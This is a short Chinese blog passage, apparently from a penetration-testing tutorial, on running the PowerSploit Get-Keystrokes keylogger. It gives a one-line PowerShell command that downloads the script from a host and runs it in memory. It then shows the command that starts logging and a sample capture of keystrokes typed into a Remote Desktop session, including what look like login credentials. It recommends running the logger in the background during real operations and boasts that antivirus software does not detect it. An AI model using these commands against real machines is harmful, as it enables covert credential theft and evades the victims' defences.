1. Get-Keystrokes
Get-Keystrokes是Exfiltration模块下的一个脚本,用于键盘记录,功能相当强大,不仅有键盘输入记录,甚至能记录鼠标的点击情况,还能记录详细的时间,实战时可以直接放入后台运行。
2. 下载脚本
IEX (New-Object Net.WebClient).DownloadString("http://192.168.101.46/PowerSploit/Exfiltration/Get-Keystrokes.ps1")
3. 开启键盘记录命令
Get-Keystrokes -LogPath c:\test1.txt输出test1.txt的结果如下
"TypedKey","WindowTitle","Time"
"m","「开始」菜单","2022/5/4 21:45:54"
"s","「开始」菜单","2022/5/4 21:45:55"
"t","「开始」菜单","2022/5/4 21:45:55"
"s","「开始」菜单","2022/5/4 21:45:55"
"c","「开始」菜单","2022/5/4 21:45:55"
"<Enter>","「开始」菜单","2022/5/4 21:45:56"
"<Right>","远程桌面连接","2022/5/4 21:46:01"
"<Backspace>","远程桌面连接","2022/5/4 21:46:02"
"<Backspace>","远程桌面连接","2022/5/4 21:46:02"
"<Backspace>","远程桌面连接","2022/5/4 21:46:02"
"<Backspace>","远程桌面连接","2022/5/4 21:46:02"
"4","远程桌面连接","2022/5/4 21:46:03"
"6","远程桌面连接","2022/5/4 21:46:03"
"<Enter>","远程桌面连接","2022/5/4 21:46:03"
"w","远程桌面连接","2022/5/4 21:46:13"
"a","远程桌面连接","2022/5/4 21:46:13"
"n","远程桌面连接","2022/5/4 21:46:13"
"f","远程桌面连接","2022/5/4 21:46:13"
"a","远程桌面连接","2022/5/4 21:46:14"
"n","远程桌面连接","2022/5/4 21:46:14"
"< >","远程桌面连接","2022/5/4 21:46:16"
"a","远程桌面连接","2022/5/4 21:46:18"
"s","远程桌面连接","2022/5/4 21:46:18"
"d","远程桌面连接","2022/5/4 21:46:18"
"f","远程桌面连接","2022/5/4 21:46:18"
"-","远程桌面连接","2022/5/4 21:46:18"
"1","远程桌面连接","2022/5/4 21:46:18"
"2","远程桌面连接","2022/5/4 21:46:18"
"3","远程桌面连接","2022/5/4 21:46:18"
经实验测试,杀毒软件不报毒!!!
1936
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
